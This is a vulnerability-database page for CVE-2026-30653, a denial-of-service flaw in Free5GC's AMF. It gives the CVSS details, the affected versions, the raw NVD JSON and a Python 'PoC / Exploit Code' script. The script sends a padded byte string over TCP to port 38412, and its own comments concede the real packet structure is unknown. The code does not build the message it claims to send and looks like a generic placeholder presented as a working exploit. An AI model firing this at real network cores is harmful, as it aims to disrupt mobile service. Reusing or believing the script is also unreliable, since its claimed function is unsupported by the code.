Security Vulnerability Report
中文
CVE-2026-30653 CVSS 7.5 HIGH

CVE-2026-30653

Published: 2026-03-24 15:16:34
Last Modified: 2026-03-24 20:16:27

Description

An issue in Free5GC v.4.2.0 and before allows a remote attacker to cause a denial of service via the function HandleAuthenticationFailure of the component AMF

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:free5gc:free5gc:*:*:*:*:*:*:*:* - VULNERABLE
Free5GC <= 4.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # PoC for CVE-2026-30653 # This script attempts to trigger the DoS in Free5GC AMF # by sending a malformed packet to the AMF service. # Note: Actual packet structure depends on the specific NAS/NGAP implementation details. def send_exploit(target_ip, target_port): try: # Establish a TCP connection to the AMF interface s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) # Construct a malformed payload intended to trigger # the HandleAuthenticationFailure vulnerability. # This payload simulates a corrupted authentication failure message. # Example: Buffer overflow pattern or specific protocol trigger payload = b"\x00\x00\x00\x01" + b"A" * 1000 print(f"[+] Sending payload to {target_ip}:{target_port}") s.send(payload) # Wait briefly to check if connection closes (crash) s.recv(1024) s.close() print("[+] Payload sent. Check if AMF service crashed.") except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": TARGET_IP = "192.168.56.101" # Replace with actual AMF IP TARGET_PORT = 38412 # Common AMF port (SCTP/HTTP) send_exploit(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30653", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:34.137", "lastModified": "2026-03-24T20:16:26.650", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Free5GC v.4.2.0 and before allows a remote attacker to cause a denial of service via the function HandleAuthenticationFailure of the component AMF"}, {"lang": "es", "value": "Un problema en Free5GC v.4.2.0 y versiones anteriores permite a un atacante remoto causar una denegación de servicio a través de la función HandleAuthenticationFailure del componente AMF."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:free5gc:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.2.0", "matchCriteriaId": "C3655699-AB73-4033-AFD6-A368AEE881A0"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/issues/826", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}